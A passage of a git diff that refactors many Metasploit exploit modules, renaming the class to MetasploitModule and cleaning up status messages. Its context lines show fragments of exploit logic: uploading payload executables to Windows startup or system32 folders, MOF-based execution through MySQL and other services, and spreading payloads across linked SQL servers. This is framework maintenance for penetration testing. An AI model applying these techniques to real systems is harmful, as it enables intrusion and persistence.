initialized") + print_error("The connection with the Dispatcher has not been initialized") return end @@ -162,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote crash << payload.encoded end - print_status("#{peer} - Sending crafted message") + print_status("Sending crafted message") message = "\x10\x06\x20" + [crash.length].pack("n") + crash diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" diff --git a/modules/exploits/windows/misc/shixxnote_font.rb b/modules/exploits/windows/misc/shixxnote_font.rb index 1b536ec7a4..35326a2771 100644 --- a/modules/exploits/windows/misc/shixxnote_font.rb +++ b/modules/exploits/windows/misc/shixxnote_font.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb index b2a11ea670..fb3049aa86 100644 --- a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb +++ b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp @@ -81,13 +81,13 @@ class Metasploit3 < Msf::Exploit::Remote res = sock.get_once disconnect if !res - vprint_error "#{peer} - Connection failed." + vprint_error "Connection failed." Exploit::CheckCode::Unknown elsif res == "\x00\x00\x00\x00" - vprint_status "#{peer} - Received reply (#{res.length} bytes)" + vprint_status "Received reply (#{res.length} bytes)" Exploit::CheckCode::Detected else - vprint_warning "#{peer} - Unexpected reply (#{res.length} bytes)" + vprint_warning "Unexpected reply (#{res.length} bytes)" Exploit::CheckCode::Safe end end @@ -115,9 +115,9 @@ class Metasploit3 < Msf::Exploit::Remote if !res fail_with(Failure::Unknown, "#{peer} - Connection failed.") elsif res == "\x00\x00\x00\x00" - print_status "#{peer} - Received reply (#{res.length} bytes)" + print_status "Received reply (#{res.length} bytes)" else - print_warning "#{peer} - Unexpected reply (#{res.length} bytes)" + print_warning "Unexpected reply (#{res.length} bytes)" end end @@ -129,15 +129,15 @@ class Metasploit3 < Msf::Exploit::Remote exe = generate_payload_exe exe_name = "#{rand_text_alpha(rand(10) + 5)}.exe" if target.name =~ /Automatic/ or target.name =~ /Vista/ - print_status("#{peer} - Writing EXE to startup for all users (#{exe.length} bytes)") + print_status("Writing EXE to startup for all users (#{exe.length} bytes)") upload("#{depth}\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\#{exe_name}", exe) end if target.name =~ /Automatic/ or target.name =~ /XP/ - print_status("#{peer} - Sending EXE (#{exe.length} bytes)") + print_status("Sending EXE (#{exe.length} bytes)") upload("#{depth}\\WINDOWS\\system32\\#{exe_name}", exe) mof_name = "#{rand_text_alpha(rand(10) + 5)}.mof" mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name)) - print_status("#{peer} - Sending MOF (#{mof.length} bytes)") + print_status("Sending MOF (#{mof.length} bytes)") upload("#{depth}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}") end diff --git a/modules/exploits/windows/misc/splayer_content_type.rb b/modules/exploits/windows/misc/splayer_content_type.rb index 988b83a081..42ab69a938 100644 --- a/modules/exploits/windows/misc/splayer_content_type.rb +++ b/modules/exploits/windows/misc/splayer_content_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/stream_down_bof.rb b/modules/exploits/windows/misc/stream_down_bof.rb index 1d1237953b..6975c8e264 100644 --- a/modules/exploits/windows/misc/stream_down_bof.rb +++ b/modules/exploits/windows/misc/stream_down_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/windows/misc/talkative_response.rb b/modules/exploits/windows/misc/talkative_response.rb index 4b867975e7..34f7cbf704 100644 --- a/modules/exploits/windows/misc/talkative_response.rb +++ b/modules/exploits/windows/misc/talkative_response.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/tiny_identd_overflow.rb b/modules/exploits/windows/misc/tiny_identd_overflow.rb index cf947bc553..a12b6c76f8 100644 --- a/modules/exploits/windows/misc/tiny_identd_overflow.rb +++ b/modules/exploits/windows/misc/tiny_identd_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb b/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb index a7c7d48bfa..602dcce773 100644 --- a/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb +++ b/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ufo_ai.rb b/modules/exploits/windows/misc/ufo_ai.rb index de6bdafa9a..fbfeab6bd0 100644 --- a/modules/exploits/windows/misc/ufo_ai.rb +++ b/modules/exploits/windows/misc/ufo_ai.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/windows_rsh.rb b/modules/exploits/windows/misc/windows_rsh.rb index d6acee9bb0..8db7d2160c 100644 --- a/modules/exploits/windows/misc/windows_rsh.rb +++ b/modules/exploits/windows/misc/windows_rsh.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/wireshark_lua.rb b/modules/exploits/windows/misc/wireshark_lua.rb index 34fe258f61..2038a67811 100644 --- a/modules/exploits/windows/misc/wireshark_lua.rb +++ b/modules/exploits/windows/misc/wireshark_lua.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/wireshark_packet_dect.rb b/modules/exploits/windows/misc/wireshark_packet_dect.rb index 18d24e0ecc..4ac2312823 100644 --- a/modules/exploits/windows/misc/wireshark_packet_dect.rb +++ b/modules/exploits/windows/misc/wireshark_packet_dect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Capture diff --git a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb index c20731b6f7..702c4c0e37 100644 --- a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb +++ b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/motorola/timbuktu_fileupload.rb b/modules/exploits/windows/motorola/timbuktu_fileupload.rb index 178db155a1..8b7959b40c 100644 --- a/modules/exploits/windows/motorola/timbuktu_fileupload.rb +++ b/modules/exploits/windows/motorola/timbuktu_fileupload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb index a4bb8bffe2..f16938f734 100644 --- a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb +++ b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/ms02_039_slammer.rb b/modules/exploits/windows/mssql/ms02_039_slammer.rb index bebd9c7c2d..cf6ca68dcc 100644 --- a/modules/exploits/windows/mssql/ms02_039_slammer.rb +++ b/modules/exploits/windows/mssql/ms02_039_slammer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/ms02_056_hello.rb b/modules/exploits/windows/mssql/ms02_056_hello.rb index 91180f3205..4016a5c781 100644 --- a/modules/exploits/windows/mssql/ms02_056_hello.rb +++ b/modules/exploits/windows/mssql/ms02_056_hello.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index fa9004658b..fda5bfcd30 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL @@ -377,7 +377,7 @@ exec sp_executesql @z| runme.gsub!(/%STUFF%/, enc) # go! - if (not mssql_login_datastore) + if !mssql_login_datastore fail_with(Failure::NoAccess, "Unable to log in!") end begin @@ -452,7 +452,7 @@ exec sp_executesql @z| return nil end - if (not logged_in) + if !logged_in fail_with(Failure::NoAccess, "Invalid SQL Server credentials") end res = mssql_query("select @@version", datastore['VERBOSE']) diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index 320da58665..ebf8b5f23c 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL_SQLI diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index e9bc7580e0..f5ad07850b 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::MSSQL @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', 'false']), + OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', false]), OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']), OptString.new('PASSWORD', [true, 'The password for the specified username']) ], self.class) @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote # Check if credentials are correct print_status("Attempting to connect to SQL Server at #{rhost}:#{rport}...") - if (not mssql_login_datastore) + if !mssql_login_datastore print_error("Invalid SQL Server credentials") print_status("-------------------------------------------------") return @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote } if masterList.length == 1 print_good("Successfully connected to #{server["name"]}") - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] show_configs(server["name"],parse_results,true) elsif server["db_sysadmin"] == 1 print_good("Sysadmin on #{server["name"]}") @@ -185,7 +185,7 @@ class Metasploit3 < Msf::Exploit::Remote write_to_report(name,server,parse_results,linked_server_table,link_status) # Display link server information in verbose mode - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] show_configs(name,parse_results) print_status(" o Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}") else @@ -219,7 +219,7 @@ class Metasploit3 < Msf::Exploit::Remote linked_server_table << [server["name"],server["db_version"],server["db_os"],name,'NA','NA','NA','NA','Connection Failed'] # Display status to user - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] print_status(" ") print_error("Linked Server: #{name} ") print_error(" o Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed") @@ -435,14 +435,14 @@ class Metasploit3 < Msf::Exploit::Remote if datastore['DEPLOYLIST']=="" datastore['DEPLOYLIST'] = nil end - if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + if !datastore['DEPLOYLIST'].nil? && datastore["VERBOSE"] print_status("\t - Checking if #{name} is on the deploy list...") end if datastore['DEPLOYLIST'] != nil deploylist = datastore['DEPLOYLIST'].upcase.split(',') end if datastore['DEPLOYLIST'] == nil or deploylist.include? name.upcase - if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + if !datastore['DEPLOYLIST'].nil? && datastore["VERBOSE"] print_status("\t - #{name} is on the deploy list.") end unless shelled.include?(name) @@ -451,7 +451,7 @@ class Metasploit3 < Msf::Exploit::Remote else print_status("Payload already deployed on #{name}") end - elsif datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + elsif !datastore['DEPLOYLIST'].nil? && datastore["VERBOSE"] print_status("\t - #{name} is not on the deploy list") end end diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index d5ebe45d04..7fa63780fa 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote end def check - if (not mssql_login_datastore) + if !mssql_login_datastore vprint_status("Invalid SQL Server credentials") return Exploit::CheckCode::Detected end @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - if (not mssql_login_datastore) + if !mssql_login_datastore print_status("Invalid SQL Server credentials") return end diff --git a/modules/exploits/windows/mssql/mssql_payload_sqli.rb b/modules/exploits/windows/mssql/mssql_payload_sqli.rb index 4ab1c8beb6..ae7a014bd5 100644 --- a/modules/exploits/windows/mssql/mssql_payload_sqli.rb +++ b/modules/exploits/windows/mssql/mssql_payload_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MSSQL_SQLI diff --git a/modules/exploits/windows/mysql/mysql_mof.rb b/modules/exploits/windows/mysql/mysql_mof.rb index f0147cad1f..b725efdf71 100644 --- a/modules/exploits/windows/mysql/mysql_mof.rb +++ b/modules/exploits/windows/mysql/mysql_mof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL @@ -92,17 +92,17 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_status("Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") begin m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) return if not m rescue RbMysql::AccessDeniedError - print_error("#{peer} - Access denied.") + print_error("Access denied.") return end if not is_windows? - print_error("#{peer} - Remote host isn't Windows.") + print_error("Remote host isn't Windows.") return end @@ -110,24 +110,24 @@ class Metasploit3 < Msf::Exploit::Remote exe_name = Rex::Text::rand_text_alpha(5) + ".exe" dest = "#{drive}:/windows/system32/#{exe_name}" exe = generate_payload_exe - print_status("#{peer} - Uploading to '#{dest}'") + print_status("Uploading to '#{dest}'") begin upload_file(exe, dest) register_file_for_cleanup("#{exe_name}") rescue RbMysql::AccessDeniedError - print_error("#{peer} - No permission to write. I blame kc :-)") + print_error("No permission to write. I blame kc :-)") return end mof_name = Rex::Text::rand_text_alpha(5) + ".mof" dest = "#{drive}:/windows/system32/wbem/mof/#{mof_name}" mof = generate_mof(mof_name, exe_name) - print_status("#{peer} - Uploading to '#{dest}'") + print_status("Uploading to '#{dest}'") begin upload_file(mof, dest) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") rescue RbMysql::AccessDeniedError - print_error("#{peer} - No permission to write. Bail!") + print_error("No permission to write. Bail!") return end end diff --git a/modules/exploits/windows/mysql/mysql_payload.rb b/modules/exploits/windows/mysql/mysql_payload.rb index 46db38c85c..ec4908d59a 100644 --- a/modules/exploits/windows/mysql/mysql_payload.rb +++ b/modules/exploits/windows/mysql/mysql_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL diff --git a/modules/exploits/windows/mysql/mysql_start_up.rb b/modules/exploits/windows/mysql/mysql_start_up.rb index 29a09fcac5..e327a41670 100644 --- a/modules/exploits/windows/mysql/mysql_start_up.rb +++ b/modules/exploits/windows/mysql/mysql_start_up.rb @@ -4,7 +4,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/") end - print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_status("Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") begin m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) rescue RbMysql::AccessDeniedError @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}" exe = generate_payload_exe - print_status("#{peer} - Uploading to '#{dest}'") + print_status("Uploading to '#{dest}'") begin upload_file(exe, dest) rescue RbMysql::AccessDeniedError diff --git a/modules/exploits/windows/mysql/mysql_yassl_hello.rb b/modules/exploits/windows/mysql/mysql_yassl_hello.rb index 8117dfec8f..b1f4985272 100644 --- a/modules/exploits/windows/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/windows/mysql/mysql_yassl_hello.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb index 44eb354357..7eb98360a0 100644 --- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb +++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL diff --git a/modules/exploits/windows/nfs/xlink_nfsd.rb b/modules/exploits/windows/nfs/xlink_nfsd.rb index 0811a8ec5c..7f36adb06e 100644 --- a/modules/exploits/windows/nfs/xlink_nfsd.rb +++ b/modules/exploits/windows/nfs/xlink_nfsd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/nntp/ms05_030_nntp.rb b/modules/exploits/windows/nntp/ms05_030_nntp.rb index d1e2bd80c7..cf5ffbafb5 100644 --- a/modules/exploits/windows/nntp/ms05_030_nntp.rb +++ b/modules/exploits/windows/nntp/ms05_030_nntp.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb index fd2883bd84..f804a1afeb 100644 --- a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb +++ b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient @@ -104,13 +104,13 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Generating VBS file...") mof_content = generate_mof("#{@var_mof_name}.mof", "#{@var_vbs_name}.vbs") - print_status("#{peer} - Uploading the VBS file") + print_status("Uploading the VBS file") worked = upload_file("WINDOWS\\system32\\#{@var_vbs_name}.vbs", vbs_content) unless worked fail_with(Failure::NotVulnerable, "Failed to upload the file") end - print_status("#{peer} - Uploading the MOF file") + print_status("Uploading the MOF file") upload_file("WINDOWS\\system32\\wbem\\mof\\#{@var_mof_name}.mof", mof_content) end @@ -132,9 +132,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.include? "<RESULT><VERSION>1</VERSION><STATUS>0</STATUS></RESULT>" - print_warning("#{peer} - File successfully uploaded: #{filename}") + print_warning("File successfully uploaded: #{filename}") else - print_error("#{peer} - Failed to upload the file") + print_error("Failed to upload the file") return false end diff --git a/modules/exploits/windows/novell/groupwisemessenger_client.rb b/modules/exploits/windows/novell/groupwisemessenger_client.rb index 212d81188d..d93490f75f 100644 --- a/modules/exploits/windows/novell/groupwisemessenger_client.rb +++ b/modules/exploits/windows/novell/groupwisemessenger_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/novell/netiq_pum_eval.rb b/modules/exploits/windows/novell/netiq_pum_eval.rb index b437751a1a..47e020de48 100644 --- a/modules/exploits/windows/novell/netiq_pum_eval.rb +++ b/modules/exploits/windows/novell/netiq_pum_eval.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/windows/novell/nmap_stor.rb b/modules/exploits/windows/novell/nmap_stor.rb index 36575b89bd..91b4b995b8 100644 --- a/modules/exploits/windows/novell/nmap_stor.rb +++ b/modules/exploits/windows/novell/nmap_stor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_desktop_agent.rb b/modules/exploits/windows/novell/zenworks_desktop_agent.rb index 8899a87ccf..9b12cc218e 100644 --- a/modules/exploits/windows/novell/zenworks_desktop_agent.rb +++ b/modules/exploits/windows/novell/zenworks_desktop_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb index 08817cddeb..98e16a76dc 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb index 911d0683cf..5577884048 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb index bbc14601ec..bfc3cdb83d 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb b/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb index f4930191b4..bd7318ef14 100644 --- a/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb +++ b/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/oracle/client_system_analyzer_upload.rb b/modules/exploits/windows/oracle/client_system_analyzer_upload.rb index b305977fbb..d018f07b73 100644 --- a/modules/exploits/windows/oracle/client_system_analyzer_upload.rb +++ b/modules/exploits/windows/oracle/client_system_analyzer_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Oracle Containers for J2EE/ ] } diff --git a/modules/exploits/windows/oracle/extjob.rb b/modules/exploits/windows/oracle/extjob.rb index 7af245692f..1ce2930169 100644 --- a/modules/exploits/windows/oracle/extjob.rb +++ b/modules/exploits/windows/oracle/extjob.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/oracle/osb_ndmp_auth.rb b/modules/exploits/windows/oracle/osb_ndmp_auth.rb index bd720f2aee..e37b98a008 100644 --- a/modules/exploits/windows/oracle/osb_ndmp_auth.rb +++ b/modules/exploits/windows/oracle/osb_ndmp_auth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::NDMP diff --git a/modules/exploits/windows/oracle/tns_arguments.rb b/modules/exploits/windows/oracle/tns_arguments.rb index 8d33b8642c..f59db5a41d 100644 --- a/modules/exploits/windows/oracle/tns_arguments.rb +++ b/modules/exploits/windows/oracle/tns_arguments.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::TNS diff --git a/modules/exploits/windows/oracle/tns_auth_sesskey.rb b/modules/exploits/windows/oracle/tns_auth_sesskey.rb index 228927ad94..21d7fc7fb5 100644 --- a/modules/exploits/windows/oracle/tns_auth_sesskey.rb +++ b/modules/exploits/windows/oracle/tns_auth_sesskey.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::TNS diff --git a/modules/exploits/windows/oracle/tns_service_name.rb b/modules/exploits/windows/oracle/tns_service_name.rb index 5dcf583fc3..4b7cd04159 100644 --- a/modules/exploits/windows/oracle/tns_service_name.rb +++ b/modules/exploits/windows/oracle/tns_service_name.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include 